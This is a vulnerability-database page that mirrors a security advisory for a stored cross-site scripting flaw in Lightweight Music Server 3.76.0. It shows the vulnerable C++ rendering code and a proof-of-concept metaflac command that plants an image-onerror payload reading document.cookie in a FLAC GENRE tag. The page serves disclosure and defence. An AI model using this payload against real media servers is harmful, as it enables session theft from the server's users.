Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Lightweight Music Server 3.76.0 Cross Site Scripting

🗓️ 01 Jun 2026 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm🔗 packetstorm.news👁 23 Views

Lightweight Music Server 3.76.0 saves unencoded metadata tags allowing persistent cross-site scripting.

Code
Lightweight Music Server (LMS) 3.76.0 (metadata) Stored XSS
    
    
    Vendor: Emeric Poupon
    Product web page: https://github.com/epoupon/lms
    Affected version 3.76.0
    
    Summary: LMS (Lightweight Music Server): A specific C++ based
    project focused on a low memory footprint, featuring built-in
    user management and a recommendation engine.
    
    Desc: LMS stores media file metadata tags (such as GENRE, ARTIST,
    and ALBUM) exactly as written in the file and later renders them
    in its web interface without HTML-encoding, resulting in stored
    cross-site scripting. An attacker who gets a file with a malicious
    tag into the victim's library has their payload saved during the
    next library scan and executed automatically whenever a user views
    that track's information or plays the file in the web UI.
    
    --------------------------------------------------------------
    /src/lms/ui/Utils.cpp
    ---------------------
    131: std::unique_ptr<Wt::WInteractWidget> createFilter(const Wt::WString& name, const Wt::WString& tooltip, std::string_view colorStyleClass, bool canDelete)
    132: {
    133:   auto res{ std::make_unique<Wt::WText>(Wt::WString{ canDelete ? "<i class=\"fa fa-times-circle\"></i> " : "" } + name, Wt::TextFormat::UnsafeXHTML) };
    134:   res->setStyleClass("Lms-badge-cluster badge me-1 " + std::string{ colorStyleClass });
    135:   res->setInline(true);
    136:   return res;
    137: }
    --------------------------------------------------------------
    
    Tested on: GNU/Linux (ARM64)
               nginx
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                @zeroscience
    
    
    Advisory ID: ZSL-2026-5987
    Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5987
    
    
    27.05.2026
    
    --
    
    
    $ metaflac --set-tag=GENRE="<img src=1 onerror=alert(document.cookie)>" evil.flac
    $ metaflac --list evil.flac
    METADATA block #0
      type: 0 (STREAMINFO)
      is last: false
      length: 34
      minimum blocksize: 4608 samples
      maximum blocksize: 4608 samples
      minimum framesize: 2305 bytes
      maximum framesize: 14124 bytes
      sample_rate: 44100 Hz
      channels: 2
      bits-per-sample: 16
      total samples: 4664587
      MD5 signature: 2aeee69c0153cb652c718dfdf0e9ff2d
    METADATA block #1
      type: 4 (VORBIS_COMMENT)
      is last: false
      length: 98
      vendor string: Lavf57.83.100
      comments: 2
        comment[0]: encoder=Lavf57.83.100
        comment[1]: GENRE=<img src=1 onerror=alert(document.cookie)>
    METADATA block #2
      type: 1 (PADDING)
      is last: true
      length: 8140

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jun 2026 00:00Current
5.3Medium risk
Vulners AI Score5.3
cross site scriptingunencoded metadatamalicious tagweb interfacelibrary scan
23